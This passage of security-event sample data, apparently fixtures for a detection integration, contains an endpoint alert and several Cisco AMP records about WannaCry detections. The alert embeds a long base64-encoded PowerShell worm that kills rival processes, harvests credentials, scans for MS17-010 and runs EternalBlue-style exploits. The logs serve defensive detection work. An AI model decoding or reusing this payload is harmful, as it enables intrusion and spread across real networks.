AArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 